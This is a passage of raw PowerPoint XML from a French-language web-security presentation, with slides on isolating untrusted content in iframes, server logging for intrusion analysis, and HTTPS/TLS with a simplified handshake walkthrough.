                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42D13181-931E-44C0-AF15-06383AA838A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="765352" y="1859339"/>
            <a:ext cx="10603381" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="75000"/>
              <a:alpha val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Une </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> est un morceau de code HTML imbriqué dans la page HTML courante. Les utilisations de la balise &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;  :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>■ inclusion de contenu externe (publicité, carte, vidéo, liens de partages, etc.) ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>■ présentation de contenu segmenté (carte météo, code avec prévisualisation, etc.) ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>■ expérience de navigation sans rechargement de la page principale.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>L’intérêt des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>iframes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> est de permettre la présentation de contenus dont on ne maîtrise pas le code, tout en contrôlant les interactions avec le contexte de la page courante.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="ZoneTexte 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3394EDEA-DCD4-41F4-9884-439D26149FB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="765352" y="5129409"/>
            <a:ext cx="10603381" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Les traitements utilisant des ressources externes non maîtrisées, mais nécessitant la présence d’un DOM devront être isolés dans une </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> afin d’interdire leurs accès aux DOM.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41143488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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="685800"/>
            <a:ext cx="10603381" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La journalisation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C935050-436F-41B5-A923-6582B4485FD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="1797942"/>
            <a:ext cx="10453481" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="75000"/>
              <a:alpha val="42000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La journalisation est un élément important de l’analyse a posteriori d’une intrusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Il peut être nécessaire de définir une politique de journalisation précisant notamment les modalités et les durées de conservation des différents journaux ainsi que les méthodes d’analyse et de corrélation des données produites. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DF4B786-DBD8-4A0C-8F10-EDE1E03D5311}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684211" y="3734556"/>
            <a:ext cx="4847159" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000">
              <a:alpha val="48000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Parmi les éléments à journaliser, outre les données classiques (IP du client, horodatage des requêtes, URL demandée, codes d’erreur, etc.), il peut être intéressant de journaliser les champs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, Origine  et user-agent des requêtes HTTP.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="ZoneTexte 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B9F188B-39E9-44F9-9BE9-7861943E05F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6475751" y="3810756"/>
            <a:ext cx="4661941" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="75000"/>
              <a:alpha val="53000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Il est important de ne pas se contenter de la journalisation du serveur web mais de combiner ces informations avec les autres journaux du système (tentative de connexion aux interfaces d’administration, pare-feu local, redémarrage du système, etc.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82370343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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614427" y="460948"/>
            <a:ext cx="10963145" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Utilisation de la TLS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94386A09-5D43-4827-8FCA-42CB97A0D74C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1624695" y="1547336"/>
            <a:ext cx="8607490" cy="1908215"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050">
              <a:alpha val="47000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La mise en place de HTTPS sur un site ou une application web est une garantie de sécurité qui repose sur TLS – Transport </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Layer Security (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>plus sûre que l’ancienne SSL – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Secure Sockets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Layer) pour assurer la confidentialité et l’intégrité des informations échangées, ainsi que l’authenticité du serveur contacté.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54920125-0311-476E-8542-505E4541D162}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1624695" y="3791348"/>
            <a:ext cx="8607490" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="47000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La mise en place de HTTPS a pour objectif :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ■ de garantir, autant que possible, l’authenticité du site consulté ; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ■ de garantir l’intégrité et la confidentialité des données échangées en bloquant les attaques de type Man-In-The-Middle (écoute, interception ou modification des échanges à la volée par des tiers, à l’insu de l’utilisateur)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="333983048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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="446807"/>
            <a:ext cx="8001000" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Protocoles SSL/TLS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="ZoneTexte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4305D5AE-0AFC-4088-AC73-1797467AE6CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608279" y="1696128"/>
            <a:ext cx="7292974" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="courier new" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1- Je veux communiquer de manière sécurisée (HTTPS)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FA0CE0F-6231-433D-B680-D6545DE02F98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2564523" y="2516658"/>
            <a:ext cx="7062953" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="courier new" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2- Je suis un serveur que tu cherches. Voici mon certificat pour le prouver</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C14BB4AC-62CA-4B67-B440-A03DF41BA429}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608279" y="3479863"/>
            <a:ext cx="6849756" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="courier new" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3- Ok, c’est bien toi. Etablissons une communication sécurisée. Voici mes paramètres</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E3A4A1B-2F97-4F8B-85D3-FC047C83F338}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608279" y="4597383"/>
            <a:ext cx="10631488" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="courier new" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4- Voici les miens</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{020F56B6-57C1-44CE-8F3D-AC2F934A3CF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608279" y="5475953"/>
            <a:ext cx="10631488" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="courier new" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>5- Envoie moi la page d’accueil cryptée</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="ZoneTexte 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84158F25-69B2-4B0C-A75D-0B985719A3BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2564523" y="6097889"/>
            <a:ext cx="3842378" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
